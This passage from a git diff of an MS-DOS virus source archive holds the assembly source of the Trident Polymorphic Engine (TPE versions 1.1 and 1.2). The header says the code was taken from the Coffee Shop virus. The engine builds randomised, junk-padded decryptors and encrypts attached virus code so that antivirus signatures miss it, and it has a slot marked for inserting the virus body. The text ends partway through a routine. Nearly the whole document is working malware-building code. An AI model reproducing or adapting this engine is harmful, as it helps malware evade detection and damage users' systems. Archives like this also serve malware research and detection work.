ptr xor_val,ax ;store non-zero encryptor + call do_junk ;insert random instructions + pop cx + mov ax,0111h ;make flags to remember which + test bl,20h ; MOV instructions are used + jne z0 + xor al,07 + +z0: + test bl,0ch + jne z1 + xor al,70h + +z1: + test bl,40h + jne z2 + xor ah,7 + +z2: + test bl,10h + jne z3 + and al,73h + +z3: + test bh,80h + jne z4 + and al,70h + +z4: + mov dx,ax + +mov_lup: + call rnd_get ;put MOV instrucions in a + and ax,0fh ; random order + cmp al,0ah + ja mov_lup + mov si,ax ; + push cx ;test if MOV already done + xchg ax,cx + mov ax,1 + shl ax,cl + mov cx,ax + and cx,dx + pop cx + je mov_lup + xor dx,ax ;remember which MOV done + push dx + call do_mov + call do_nop ;insert a random NOP + pop dx + or dx,dx ;all MOVs done? + jne mov_lup + push di ;save start of decryptor loop + call do_add_ax ;ADD AX for loop + call do_nop + test bh,20h ;carry with ADD/SUB? + je no_clc + mov al,0f8h + stosb + +no_clc: + mov word ptr xor_offset,0 + call do_xor ;place all loop instructions + call do_nop + call do_add + pop dx ;get start of decryptor loop + call do_loop + test byte ptr store_mov,8 ;insert POP AX? + je no_pop + mov al,58h + stosb + +no_pop: + xor ax,ax + test bh,01 + je no_pop2 + mov ax,cx + dec ax + test bl,10h + je no_pop2 + and al,0feh + +no_pop2: + add ax,di ;calculate loop offset + add ax,bp + pop si + add ax,si + sub ax,word ptr xor_offset + mov si,word ptr where_len + test bl,0ch ;are BL,BH used for encryption? + jne v2 + mov byte ptr es:[si],al + mov si,word ptr where_len2 + mov byte ptr es:[si],ah + jmp short v3 + +v2: + mov word ptr es:[si],ax + +v3: + mov dx,word ptr xor_val + pop si ;ds:si=start of code + pop ds + push di ;save pointer to start of code + push cx ; and length of encrypted code + test bl,10h ;byte or word? + je blup + inc cx ;cx=# of crypts (words) + shr cx,1 + +lup: + lodsw ;encrypt code (words) + call do_encrypt + stosw + loop lup + jmp short klaar + +blup: + lodsb ;encrypt code (bytes) + xor dh,dh + call do_encrypt + stosb + loop blup + +klaar: + mov cx,di ;cx=lenth decryptor + code + pop ax ;ax=length of decrypted code + pop di ;offset encrypted code + xor dx,dx ;ds:dx=decryptor + cr code + push es + pop ds + retn + +;--- Encrypt the Code ------------------------------------- + +do_encrypt: + add dx,word ptr cs:add_val + test bl,02 + jne lup1 + xor ax,dx + retn + +lup1: + test bl,01 + jne lup2 + sub ax,dx + retn + +lup2: + add ax,dx + retn + +;--- Generate MOV reg,xxxx -------------------------------- + +do_mov: + mov dx,si + mov al,byte ptr ds:mov_byte[si] + cmp dl,04 ;bx? + jne is_not_bx + call add_ind + +is_not_bx: + test dl,0ch ;a*? + pushf + jne is_not_a + test bl,80h ;a* or d*? + je is_not_a + add al,02 + +is_not_a: + call alter ;insert the MOV A* + popf + jne is_not_a2 + mov ax,word ptr ds:xor_val + jmp short sss + +is_not_a2: + test dl,08 ;b*? + jne is_not_b + mov si,offset where_len + test dl,2 + je is_not_bh + add si,2 + +is_not_bh: + mov word ptr [si],di + jmp short sss + +is_not_b: + mov ax,cx ;c*? + test bl,10h ;byte or word encrypt? + je sss + inc ax ;only 1/2 the number of bytes + shr ax,1 + +sss: + test dl,3 ;byte or word register? + je is_x + test dl,2 ;*h? + je is_not_h + xchg ah,al + +is_not_h: + stosb + retn + +is_x: + stosw + retn + +;--- Insert MOV or alternative for MOV -------------------- + +alter: + push bx + push cx + push ax + call rnd_get + xchg ax,bx + pop ax + test bl,3 ;use alternative for MOV? + je no_alter + push ax + and bx,0fh + and al,8 + shl ax,1 + or bx,ax + pop ax + and al,7 + mov cl,9 + xchg ax,cx + mul cl + add ax,30c0h + xchg ah,al + test bl,4 + je no_sub + mov al,28h + +no_sub: + call maybe_2 + stosw + mov al,80h + call maybe_2 + stosb + lea ax,word ptr alt_code + xchg ax,bx + and ax,3 + xlat + add al,cl + +no_alter: + stosb + pop cx + pop bx + retn + +;--- Insert ADD AX,xxxx ----------------------------------- + +do_add_ax: + push cx + lea si,add_val + mov word ptr [si],0 ;save ADD val + mov ax,bx + and ax,8110h + xor ax,8010h + jne no_add_ax ;use ADD? + mov ax,bx + xor ah,ah + mov cl,3 + div cl + or ah,ah + jne no_add_ax ;use ADD? + test bl,80h + jne do_81C2 ;AX or DX? + mov al,5 + stosb + jmp short do_add0 + +do_81C2: + mov ax,0c281h + stosw + +do_add0: + call rnd_get + mov word ptr [si],ax + stosw + +no_add_ax: + pop cx + retn + +;--- generate encryption command -------------------------- + +do_xor: + test byte ptr ds:flags,1 + je no_cs + mov al,2eh ;insert CS: instruction + stosb + +no_cs: + test bh,80h ;type of XOR command + je xor1 + call get_xor + call do_carry + call save_it + xor ax,ax + test bl,80h + je xxxx + add al,10h + +xxxx: + call add_dir + test bh,8 + jne yyyy + stosb + retn + +yyyy: + or al,80h + stosb + call rnd_get + stosw + mov word ptr ds:xor_offset,ax + retn + +xor1: + mov al,80h ;encrypt with value + call save_it + call get_xor + call do_carry + call xxxx + mov ax,word ptr ds:xor_val + test bl,10h + jmp byte_word + +;--- generate increase/decrease command ------------------- + +do_add: + test bl,8 ;no CMPSW/SCASW if BX is used + je da0 + test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW + jne do_cmpsw + +da0: + test bh,4 ;ADD/SUB or INC/DEC? + je add1 + mov al,40h ;INC/DEC + test bh,01 + je add0 + add al,8 + +add0: + call add_ind + stosb + test bl,10h + je return + stosb + +return: + retn + +add1: + test bh,40h ;ADD/SUB + je no_clc2 ;carry? + mov al,0f8h ;insert CLC + stosb + +no_clc2: + mov al,83h + stosb + mov al,0c0h + test bh,01 + je b0627f + mov al,0e8h ;insert XXX + +b0627f: + test bh,40h + je add2 + and al,0cfh + or al,10h + +add2: + call add_ind + stosb + mov al,01 + +save_it: + call add_1 + stosb + retn + +b06293: + test bh,01 + je do_cmpsw + mov al,0fdh ;add XXX + stosb + +do_cmpsw: + test bh,4 ;CMPSE or SCASW? + je normal_cmpsw + test bl,4 ;no SCASW if SI is used + jne do_scasw + +normal_cmpsw: + mov al,0a6h + jmp short save_it + +do_scasw: + mov al,0aeh + jmp short save_it + +;--- generate LOOP command -------------------------------- + +do_loop: + test bh,01 ;no JNE if counting down + jne do_loop2 + call rnd_get + test al,01 + jne cx_loop + +do_loop2: + mov al,0e0h ;LOOPNZ or LOOP? + test bh,1ah ; no LOOPNZ if xor-offset + je l10 ; no LOOPNZ if CMP/SCASW + add al,2 + +l10: + stosb + mov ax,dx + sub ax,di + dec ax + stosb + retn + +cx_loop: + test bh,10h ;SUB CX or DEC CX? + jne cx1_dec + mov ax,0e983h + stosw + mov al,1 + stosb + jmp short do_jne + +cx1_dec: + mov al,49h + stosb + +do_jne: + mov al,75h + jmp short l10 + +;--- add value to AL depending on register type ----------- + +add_dir: + lea si,word ptr dir_change + jmp short xx1 + +add_ind: + lea si,word ptr ind_change + +xx1: + push bx + shr bl,1 + shr bl,1 + and bx,3 + add al,byte ptr [bx+si] + pop bx + retn + +;--- move encyryption command byte to AL ------------------ + +get_xor: + push bx + lea ax,word ptr how_mode + xchg ax,bx + and ax,3 + xlat + pop bx + retn + +;--- change ADD to ADC ------------------------------------ + +do_carry: + test bl,2 ;ADD/SUB used for encryption + je no_ac + test bh,20h + je no_ac + and al,0cfh + or al,10h + +no_ac: + retn + +;--- change AL (byte/word) -------------------------------- + +add_1: + test bl,10h + je add_1_ret + inc al + +add_1_ret: + retn + +;--- change AL (byte/word) -------------------------------- + +maybe_2: + call add_1 ;can't touch this... + cmp al,81h + je maybe_not + push ax + call rnd_get + test al,1 + pop ax + je maybe_not + add al,2 + +maybe_not: + retn + +;--- insert random instructions --------------------------- + +do_nop: + test byte ptr ds: flags,2 + +yes_nop: + je no_nop + call rnd_get + test al,3 + je nop8 + test al,2 + je nop16 + +b0633b equ $+01h + test al,1 + je nop16x + +no_nop: + retn + +;--- insert random nop (or not) --------------------------- + +do_junk: + test byte ptr ds:flags,4 + je no_junk + call rnd_get ;put a random number of + and ax,0fh ; dummy instructions before + inc ax ; decryptor + xchg ax,cx + +junk_loop: + call junk + loop junk_loop + +no_junk: + retn + +junk: + call rnd_get + and ax,01eh + jmp short aa0 + +nop16x: + call rnd_get + and ax,6 + +aa0: + xchg ax,si + call rnd_get + jmp word ptr ds:junk_cals[si] + + +;----------------------------------------------------- + +junk_cals: + dw offset nop16x0 + dw offset nop16x1 + dw offset nop16x2 + dw offset nop16x3 + dw offset nop8 + dw offset nop16 + dw offset junk6 + dw offset junk7 + dw offset junk8 + dw offset junk9 + dw offset junkA + dw offset junkB + dw offset junkC + dw offset junkD + dw offset junkE + dw offset junkF + +;----------------------------------------------------- + +nop16x0: + add byte ptr [si],cl ;J* 0000 (conditional) + jo yes_nop ;jump on overflow + retn + +nop16x1: + mov al,0ebh ;JMP xxxx/junk + and ah,7 + inc ah + stosw + xchg ah,al ;get length of bullshit + cbw ;convert AL to AX + jmp fill_bullshit + +nop16x2: + call junkD ;XCHG AX,reg/XCHG AX,reg + stosb + retn + +nop16x3: + call junkF ;INC/DEC or DEC/INC + xor al,8 + stosb + retn + +nop8: + push bx + and al,7 + lea bx,word ptr nop_data8 + xlat + stosb + pop bx + retn + +nop16: + push bx + and ax,0303h + lea bx,word ptr nop_data16 + xlat + add al,ah + stosb + call rnd_get + and al,7 + mov bl,9 + mul bl + add al,0c0h + stosb + pop bx + retn + +junk6: + push cx + mov al,0e8h + and ah,0fh ;CALL xxxx/junk/POP reg + inc ah + stosw + xor al,al + stosb + xchg ah,al + call fill_bullshit + call do_nop + call rnd_get ;insert POP reg + and al,7 + call no_sp + mov cx,ax + or al,58h + stosb + test ch,3 ;more? + jne junk6_ret + call do_nop + mov ax,0f087h ;insert XCHG SI,reg + or ah,cl + test ch,8 + je j6_1 + mov al,8bh + +j6_1: + stosw + call do_nop + push bx + call rnd_get + xchg ax,bx + and bx,0f7fbh ;insert XOR [SI],xxxx + or bl,8 + call do_xor + pop bx + +junk6_ret: + pop cx + retn + +junk7: + and al,0fh ;MOV reg,xxxx + or al,0b0h + call no_sp + stosb + test al,8 + pushf + call rnd_get + popf + jmp short byte_word + +junk8: + and ah,39h ;DO r/m,r(8,16) + or al,0c0h + call no_sp + xchg ah,al + stosw + retn + +junk9: + and al,3bh ;DO r(8,16),r/m + or al,2 + and ah,3fh + call no_sp2 + call no_bp + stosw + retn + +junkA: + and ah,1 ;DO rm,xxxx + or ax,80c0h + call no_sp + xchg ah,al + stosw + test al,1 + pushf + call rnd_get + popf + jmp short byte_word + +junkB: + call nop8 ;NOP/LOOP + mov ax,0fde2h + stosw + retn + +junkC: + and al,9 ;CMPS* or SCAS* + test ah,1 + je mov_test + or al,0a6h + stosb + retn + +mov_test: + or al,0a0h ;MOV AX,[xxxx] or TEST AX,xxxx + stosb + cmp al,0a8h + pushf + call rnd_get + popf + jmp short byte_word + +junkD: + and al,7 ;XCHG AX,reg + or al,90h + call no_sp + stosb + retn + +junkE: + and ah,7 + or ah,50h + mov al,ah + or ah,8 + stosw + retn + +junkF: + and al,0fh ;INC/DEC + or al,40h + call no_sp + stosb + retn + +;--- store a byte or a word ------------------------------- + +byte_word: + je only_byte + stosw + retn + +only_byte: + stosb + retn + +;--- don't fuck with sp ----------------------------------- + +no_sp: + push ax + and al,7 + cmp al,4 + pop ax + jne no_sp_ret + and al,0fbh + +no_sp_ret: + retn + +;--- don't fuck with sp ----------------------------------- + +no_sp2: + push ax + and ah,38h + cmp ah,20h + pop ax + jne no_sp2_ret + xor ah,20h + +no_sp2_ret: + retn + +;--- don't use [bp + ..] ---------------------------------- + +no_bp: + test ah,4 + jne no_bp2 + and ah,0fdh + retn + +no_bp2: + push ax + and ah,7 + cmp ah,6 + pop ax + jne no_bp_ret + or ah,1 + +no_bp_ret: + retn + +;--- write byte for JMP/CAL and fill with random bullshit - + +fill_bullshit: + push cx + xchg ax,cx + +bull_lup: + call rnd_get + stosb + loop bull_lup + pop cx + retn + +;--- random number generator ------------------------------ + +rnd_init: + push ax + push cx + call random_init0 + and ax,0h + inc ax + xchg ax,cx + +random_lup: + call rnd_get ;cal random routine a few + loop random_lup ; times to 'warm up' + pop cx + pop ax + retn + +random_init0: + push dx ;initialize generator + push cx + mov ah,2ch + int 21h ;get time CH,CL:DH,DL + in al,40h ;timer + mov ah,al + in al,40h ;timer + xor ax,cx + xor dx,ax + jmp short mov_rnd + +rnd_get: + push dx ;calculate random number + push cx + push bx + in al,40h + +d06502 equ $+01h + add ax,0000h + +d06505 equ $+01h + mov dx,0000h + mov cx,0007h + +rnd_lup: + shl ax,1 + rcl dx,1 + mov bl,al + xor bl,dh + jns rnd_12 + inc al + +rnd_12: + loop rnd_lup + pop bx + +mov_rnd: + mov word ptr cs:d06502,ax + mov word ptr cs:d06505,dx + mov al,dl + pop cx + pop dx + retn + +;----------------------------------------------------- +;.data + +mov_byte db 0b8,0b0,0b4,00 ;AX,AL,AH,.. + db 0b8,0b3,0b7,00 ;BX,GL,GH,.. + db 0b9,0b1,0b5 ;CX,CL,CH + +nop_data8 db 90,0f8,0f9,0f5 ;NOP,CLC,STC,CMC + db 0fa,0fc,45,4dh ;CLI,CLD,INC BP,DEC BP + +nop_data16 db 08,20,84,88 ;OR,AND,XCHG,MOV + +dir_change db 07,07,04,05 ;BL/BH,BX,SI,DI + +ind_change db 03,03,06,07 ;BL/BH,BX,SI,DI + +how_mode db 30,30,00,28 ;XOR,XOR,ADD,SUB + +alt_code dw 0c800h,0c0f0h ;ADD AL,CL,???? + +add_val dw 0 +xor_val dw 0 +xor_offset dw 0 +where_len dw 0 +where_len2 dw 0 +store_mov db 0 +flags db 0 + + db '[TPE 1.1]' + +tpe_bottom equ $ + + end tpe_top + diff --git a/MSDOS/Virus.MSDOS.Unknown.tpe-v12.asm b/MSDOS/Virus.MSDOS.Unknown.tpe-v12.asm new file mode 100644 index 00000000..5aadf43a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tpe-v12.asm @@ -0,0 +1,990 @@ + .radix 16 + +;----------------------------------------------------------------------------- +; +; TPE v1.2 Source Code +; -------------------- +; +; Extracted from Coffee Shop virus by: Lucifer Messiah -- ANARKICK SYSTEMS +; +;----------------------------------------------------------------------------- + + .model tiny + .code + +public rnd_init +public rnd_get +public crypt +public tpe_bottom +public tpe_top + +;**************************************************************************** +;* Data area for engine +;**************************************************************************** + + org 0e0 +TPE12: + +add_val dw 0 +xor_val dw 0 +xor_offset dw 0 +where_len dw 0 +where_len2 dw 0 +flags db 0 + + +;**************************************************************************** +;* Begin of virus, installation in memory +;**************************************************************************** + + org 0100 + +;**************************************************************************** +;* Insert virus code here, or compile and link to virus +;**************************************************************************** + + + + + + +;**************************************************************************** +;* +;* Encryption Engine +;* +;* +;* Input: ES work segment +;* DS:DX code to encrypt +;* BP what will be start of decryptor +;* SI what will be distance between decryptor and code +;* CX length of code +;* AX flags: bit 0: DS will not be equal to CS +;* bit 1: insert random instructions +;* bit 2: put junk before decryptor +;* bit 3: preserve AX with decryptor +;* +;* Output: ES: work segment (preserved) +;* DS:DX decryptor + encrypted code +;* BP what will be start of decryptor (preserved) +;* DI length of decryptor / offset of encrypted code +;* CX length of decryptor + encrypted code +;* AX length of encrypted code +;* (other registers may be trashed) +;* +;**************************************************************************** + +tpe_top equ $ + db '[ MK / Trident ]' + +crypt: + xor di,di ;di = start of decryptor + push dx ;save offset of code + push si ;save future offset of code + + mov byte ptr ds:[flags],al ;save flags + test al,8 ;push AX? + jz no_push + mov al,50 + stosb + +no_push: call rnd_get ;add a few bytes to cx + and ax,1F + add cx,ax + push cx ;save length of code + + call rnd_get ;get random flags + xchg ax,bx + ;BX flags: + + ;0,1 how to encrypt + ;2,3 which register for encryption + ;4 use byte or word for encrypt + ;5 MOV AL, MOV AH or MOV AX + ;6 MOV CL, MOV CH or MOV CX + ;7 AX or DX + + ;8 count up or down + ;9 ADD/SUB/INC/DEC or CMPSW/SCASW + ;A ADD/SUB or INC/DEC + ; CMPSW or SCASW + ;B offset in XOR instruction? + ;C LOOPNZ or LOOP + ; SUB CX or DEC CX + ;D carry with crypt ADD/SUB + ;E carry with inc ADD/SUB + ;F XOR instruction value or AX/DX + +random: call rnd_get ;get random encryption value + or al,al + jz random ;again if 0 + mov ds:[xor_val],ax + + call do_junk ;insert random instructions + + pop cx + + mov ax,0111 ;make flags to remember which + test bl,20 ; MOV instructions are used + jnz z0 + xor al,07 +z0: test bl,0C + jnz z1 + xor al,70 +z1: test bl,40 + jnz z2 + xor ah,7 +z2: test bl,10 + jnz z3 + and al,73 +z3: test bh,80 + jnz z4 + and al,70 + +z4: mov dx,ax +mov_lup: call rnd_get ;put MOV instructions in + and ax,000F ; a random order + cmp al,0A + ja mov_lup + + mov si,ax + push cx ;test if MOV already done + xchg ax,cx + mov ax,1 + shl ax,cl + mov cx,ax + and cx,dx + pop cx + jz mov_lup + xor dx,ax ;remember which MOV done + + push dx + call do_mov ;insert MOV instruction + call do_nop ;insert a random NOP + pop dx + + or dx,dx ;all MOVs done? + jnz mov_lup + + push di ;save start of decryptor loop + + call do_add_ax ;add a value to AX in loop? + call do_nop + test bh,20 ;carry with ADD/SUB ? + jz no_clc + mov al,0F8 + stosb +no_clc: mov word ptr ds:[xor_offset],0 + call do_xor ;place all loop instructions + call do_nop + call do_add + + pop dx ;get start of decryptor loop + + call do_loop + + test byte ptr ds:[flags],8 ;insert POP AX ? + jz no_pop + mov al,58 + stosb + +no_pop: xor ax,ax ;calculate loop offset + test bh,1 ;up or down? + jz v1 + mov ax,cx + dec ax + test bl,10 ;encrypt with byte or word? + jz v1 + and al,0FE +v1: add ax,di + add ax,bp + pop si + add ax,si + sub ax,word ptr ds:[xor_offset] + mov si,word ptr ds:[where_len] + test bl,0C ;are BL,BH used for encryption? + jnz v2 + mov byte ptr es:[si],al + mov si,word ptr ds:[where_len2] + mov byte ptr es:[si],ah + jmp short v3 +v2: mov word ptr es:[si],ax + +v3: mov dx,word ptr ds:[xor_val] ;encryption value + + pop si ;ds:si = start of code + + push di ;save ptr to encrypted code + push cx ;save length of encrypted code + + test bl,10 ;byte or word? + jz blup + + inc cx ;cx = # of crypts (words) + shr cx,1 + +lup: lodsw ;encrypt code (words) + call do_encrypt + stosw + loop lup + jmp short klaar + + +blup: lodsb ;encrypt code (bytes) + xor dh,dh + call do_encrypt + stosb + loop blup + +klaar: mov cx,di ;cx = length decryptpr + code + pop ax ;ax = length of decrypted code + pop di ;di = offset encrypted code + xor dx,dx ;ds:dx = decryptor + cr. code + push es + pop ds + ret + + +;**************************************************************************** +;* encrypt the code +;**************************************************************************** + +do_encrypt: add dx,word ptr ds:[add_val] + test bl,2 + jnz lup1 + xor ax,dx + ret + +lup1: test bl,1 + jnz lup2 + sub ax,dx + ret + +lup2: add ax,dx + ret + + +;**************************************************************************** +;* generate mov reg,xxxx +;**************************************************************************** + +do_mov: mov dx,si + mov al,byte ptr ds:[si+mov_byte] + cmp dl,4 ;BX? + jne is_not_bx + call add_ind +is_not_bx: test dl,0C ;A*? + pushf + jnz is_not_a + test bl,80 ;A* or D*? + jz is_not_a + add al,2 + +is_not_a: call alter ;insert the MOV + + popf ;A*? + jnz is_not_a2 + mov ax,word ptr ds:[xor_val] + jmp short sss + +is_not_a2: test dl,8 ;B*? + jnz is_not_b + mov si,offset where_len + test dl,2 + jz is_not_bh + add si,2 +is_not_bh: mov word ptr ds:[si],di + jmp short sss + +is_not_b: mov ax,cx ;C* + test bl,10 ;byte or word encryption? + jz sss + inc ax ;only half the number of bytes + shr ax,1 +sss: test dl,3 ;byte or word register? + jz is_x + test dl,2 ;*H? + jz is_not_h + xchg al,ah +is_not_h: stosb + ret + +is_x: stosw + ret + + +;**************************************************************************** +;* insert MOV or alternative for MOV +;**************************************************************************** + +alter: push bx + push cx + push ax + call rnd_get + xchg ax,bx + pop ax + test bl,3 ;use alternative for MOV? + jz no_alter + + push ax + and bx,0F + and al,08 + shl ax,1 + or bx,ax + pop ax + + and al,7 + mov cl,9 + xchg ax,cx + mul cl + + add ax,30C0 + xchg al,ah + test bl,4 + jz no_sub + mov al,28 +no_sub: call maybe_2 + stosw + + mov al,80 + call maybe_2 + stosb + + mov ax,offset add_mode + xchg ax,bx + and ax,3 + xlat + + add al,cl +no_alter: stosb + pop cx + pop bx + ret + + +;**************************************************************************** +;* insert ADD AX,xxxx +;**************************************************************************** + +do_add_ax: push cx + mov si,offset add_val ;save add-value here + mov word ptr ds:[si],0 + mov ax,bx + and ax,8110 + xor ax,8010 + jnz no_add_ax ;use ADD? + + mov ax,bx + xor ah,ah + mov cl,3 + div cl + or ah,ah + jnz no_add_ax ;use ADD? + + test bl,80 + jnz do_81C2 ;AX or DX? + mov al,5 + stosb + jmp short do_add0 +do_81C2: mov ax,0C281 + stosw +do_add0: call rnd_get + mov word ptr ds:[si],ax + stosw +no_add_ax: pop cx + ret + + +;**************************************************************************** +;* generate encryption command +;**************************************************************************** + +do_xor: test byte ptr ds:[flags],1 + jz no_cs + mov al,2E ;insert CS: instruction + stosb + +no_cs: test bh,80 ;type of XOR command + jz xor1 + + call get_xor ;encrypt with register + call do_carry + call save_it + xor ax,ax + test bl,80 + jz xxxx + add al,10 +xxxx: call add_dir + test bh,8 + jnz yyyy + stosb + ret + +yyyy: or al,80 + stosb + call rnd_get + stosw + mov word ptr ds:[xor_offset],ax + ret + +xor1: mov al,080 ;encrypt with value + call save_it + call get_xor + call do_carry + call xxxx + mov ax,word ptr ds:[xor_val] + test bl,10 + jmp byte_word + + +;**************************************************************************** +;* generate increase/decrease command +;**************************************************************************** + +do_add: test bl,8 ;no CMPSW/SCASW if BX is used + jz da0 + test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW + jnz do_cmpsw + +da0: test bh,4 ;ADD/SUB or INC/DEC? + jz add1 + + mov al,40 ;INC/DEC + test bh,1 ;up or down? + jz add0 + add al,8 +add0: call add_ind + stosb + test bl,10 ;byte or word? + jz return + stosb ;same instruction again +return: ret + +add1: test bh,40 ;ADD/SUB + jz no_clc2 ;carry? + mov al,0F8 ;insert CLC + stosb +no_clc2: mov al,083 + stosb + mov al,0C0 + test bh,1 ;up or down? + jz add2 + mov al,0E8 +add2: test bh,40 ;carry? + jz no_ac2 + and al,0CF + or al,10 +no_ac2: call add_ind + stosb + mov al,1 ;value to add/sub +save_it: call add_1 + stosb + ret + +do_cmpsw: test bh,1 ;up or down? + jz no_std + mov al,0FDh ;insert STD + stosb +no_std: test bh,4 ;CMPSW or SCASW? + jz normal_cmpsw + test bl,4 ;no SCASW if SI is used + jnz do_scasw + +normal_cmpsw: mov al,0A6 ;CMPSB + jmp short save_it +do_scasw: mov al,0AE ;SCASB + jmp short save_it + + +;**************************************************************************** +;* generate loop command +;**************************************************************************** + +do_loop: test bh,1 ;no JNE if couting down + jnz loop_loop ; (prefetch bug!) + call rnd_get + test al,1 ;LOOPNZ/LOOP or JNE? + jnz cx_loop + +loop_loop: mov al,0E0 + test bh,1A ;LOOPNZ or LOOP? + jz ll0 ; no LOOPNZ if xor-offset + add al,2 ; no LOOPNZ if CMPSW/SCASW +ll0: stosb + mov ax,dx + sub ax,di + dec ax + stosb + ret + +cx_loop: test bh,10 ;SUB CX or DEC CX? + jnz cxl_dec + mov ax,0E983 + stosw + mov al,1 + stosb + jmp short do_jne + +cxl_dec: mov al,49 + stosb +do_jne: mov al,75 + jmp short ll0 + + +;**************************************************************************** +;* add value to AL depending on register type +;**************************************************************************** + +add_dir: mov si,offset dir_change + jmp short xx1 + +add_ind: mov si,offset ind_change +xx1: push bx + shr bl,1 + shr bl,1 + and bx,3 + add al,byte ptr ds:[bx+si] + pop bx + ret + + +;**************************************************************************** +;* mov encryption command byte to AL +;**************************************************************************** + +get_xor: push bx + mov ax,offset how_mode + xchg ax,bx + and ax,3 + xlat + pop bx + ret + + +;**************************************************************************** +;* change ADD into ADC +;**************************************************************************** + +do_carry: test bl,2 ;ADD/SUB used for encryption? + jz no_ac + test bh,20 ;carry with (encr.) ADD/SUB? + jz no_ac + and al,0CF + or al,10 +no_ac: ret + + +;**************************************************************************** +;* change AL (byte/word) +;**************************************************************************** + +add_1: test bl,10 + jz add_1_ret + inc al +add_1_ret: ret + + +;**************************************************************************** +;* change AL (byte/word) +;**************************************************************************** + +maybe_2: call add_1 + cmp al,81 ;can't touch this + je maybe_not + push ax + call rnd_get + test al,1 + pop ax + jz maybe_not + add al,2 +maybe_not: ret + + +;**************************************************************************** +;* get random nop (or not) +;**************************************************************************** + +do_nop: test byte ptr ds:[flags],2 + jz no_nop +yes_nop: call rnd_get + test al,3 + jz nop8 + test al,2 + jz nop16 + test al,1 + jz nop16x +no_nop: ret + + +;**************************************************************************** +;* Insert random instructions +;**************************************************************************** + +do_junk: test byte ptr ds:[flags],4 + jz no_junk + call rnd_get ;put a random number of + and ax,0F ; dummy instructions before + inc ax ; decryptor + xchg ax,cx +junk_loop: call junk + loop junk_loop +no_junk: ret + + +;**************************************************************************** +;* get rough random nop (may affect register values) +;**************************************************************************** + +junk: call rnd_get + and ax,1E + jmp short aa0 +nop16x: call rnd_get + and ax,06 +aa0: xchg ax,si + call rnd_get + jmp word ptr ds:[si+junkcals] + + +;**************************************************************************** +;* NOP and junk addresses +;**************************************************************************** + +junkcals dw offset nop16x0 + dw offset nop16x1 + dw offset nop16x2 + dw offset nop16x3 + dw offset nop8 + dw offset nop16 + dw offset junk6 + dw offset junk7 + dw offset junk8 + dw offset junk9 + dw offset junkA + dw offset junkB + dw offset junkC + dw offset junkD + dw offset junkE + dw offset junkF + + +;**************************************************************************** +;* NOP and junk routines +;**************************************************************************** + +nop16x0: and ax,000F ;J* 0000 (conditional) + or al,70 + stosw + ret + + +nop16x1: mov al,0EBh ;JMP xxxx / junk + and ah,07 + inc ah + stosw + xchg al,ah ;get lenght of bullshit + cbw + jmp fill_bullshit + + +nop16x2: call junkD ;XCHG AX,reg / XCHG AX,reg + stosb + ret + + +nop16x3: call junkF ;INC / DEC or DEC / INC + xor al,8 + stosb + ret + + +nop8: push bx ;8-bit NOP + and al,7 + mov bx,offset nop_data8 + xlat + stosb + pop bx + ret + + +nop16: push bx ;16-bit NOP + and ax,0303 + mov bx,offset nop_data16 + xlat + add al,ah + stosb + call rnd_get + and al,7 + mov bl,9 + mul bl + add al,0C0 + stosb + pop bx + ret + + +junk6: push cx ;CALL xxxx / junk / POP reg + mov al,0E8 + and ah,0F + inc ah + stosw + xor al,al + stosb + xchg al,ah + call fill_bullshit + call do_nop + call rnd_get ;insert POP reg + and al,7 + call no_sp + mov cx,ax + or al,58 + stosb + + test ch,3 ;more? + jnz junk6_ret + + call do_nop + mov ax,0F087 ;insert XCHG SI,reg + or ah,cl + test ch,8 + jz j6_1 + mov al,8Bh +j6_1: stosw + + call do_nop + push bx + call rnd_get + xchg ax,bx + and bx,0F7FBh ;insert XOR [SI],xxxx + or bl,8 + call do_xor + pop bx +junk6_ret: pop cx + ret + + +junk7: and al,0F ;MOV reg,xxxx + or al,0B0 + call no_sp + stosb + test al,8 + pushf + call rnd_get + popf + jmp short byte_word + + +junk8: and ah,39 ;DO r/m,r(8/16) + or al,0C0 + call no_sp + xchg al,ah + stosw + ret + + +junk9: and al,3Bh ;DO r(8/16),r/m + or al,2 + and ah,3F + call no_sp2 + call no_bp + stosw + ret + + +junkA: and ah,1 ;DO rm,xxxx + or ax,80C0 + call no_sp + xchg al,ah + stosw + test al,1 + pushf + call rnd_get + popf + jmp short byte_word + + +junkB: call nop8 ;NOP / LOOP + mov ax,0FDE2 + stosw + ret + + +junkC: and al,09 ;CMPS* or SCAS* + test ah,1 + jz mov_test + or al,0A6 + stosb + ret +mov_test: or al,0A0 ;MOV AX,[xxxx] or TEST AX,xxxx + stosb + cmp al,0A8 + pushf + call rnd_get + popf + jmp short byte_word + + +junkD: and al,07 ;XCHG AX,reg + or al,90 + call no_sp + stosb + ret + + +junkE: and ah,07 ;PUSH reg / POP reg + or ah,50 + mov al,ah + or ah,08 + stosw + ret + + +junkF: and al,0F ;INC / DEC + or al,40 + call no_sp + stosb + ret + + +;**************************************************************************** +;* store a byte or a word +;**************************************************************************** + +byte_word: jz only_byte + stosw + ret + +only_byte: stosb + ret + + +;**************************************************************************** +;* don't fuck with SP! +;**************************************************************************** + +no_sp: push ax + and al,7 + cmp al,4 + pop ax + jnz no_sp_ret + and al,0FBh +no_sp_ret: ret + + +;**************************************************************************** +;* don't fuck with SP! +;**************************************************************************** + +no_sp2: push ax + and ah,38 + cmp ah,20 + pop ax + jnz no_sp2_ret + xor ah,20 +no_sp2_ret: ret + + +;**************************************************************************** +;* don't use [BP+..] +;**************************************************************************** + +no_bp: test ah,4 + jnz no_bp2 + and ah,0FDh + ret + +no_bp2: push ax + and ah,7 + cmp ah,6 + pop ax + jnz no_bp_ret + or ah,1 +no_bp_ret: ret + + +;**************************************************************************** +;* write byte for JMP/CALL and fill with random bullshit +;**************************************************************************** + +fill_bullshit: push cx + xchg ax,cx +bull_lup: call rnd_get + stosb + loop bull_lup + pop cx + ret + + +;**************************************************************************** +;* random number generator (stolen from 'Bomber') +;**************************************************************************** + +rnd_init: push cx + call rnd_init0 ;init + and ax,000F + inc ax + xchg ax,cx +random_lup: call rnd_get ;call random routine a few + loop random_lup ; times to 'warm up' + pop cx + ret + +rnd_init0: push dx ;initialize generator + push cx + mov ah,2C + int 21 + in al,40 + mov ah,al + in al,40 + xor ax,cx + xor dx,ax + jmp short move_rnd + +rnd_get: push dx ;calculate a random number + push cx + push bx + mov ax,0 ;will be: mov ax,xxxx + mov dx,0 ; and mov dx,xxxx + mov cx,7 +rnd_lup: shl ax,1 + rcl dx,1 + mov bl,al + xor bl,dh + jns rnd_l2 + inc al 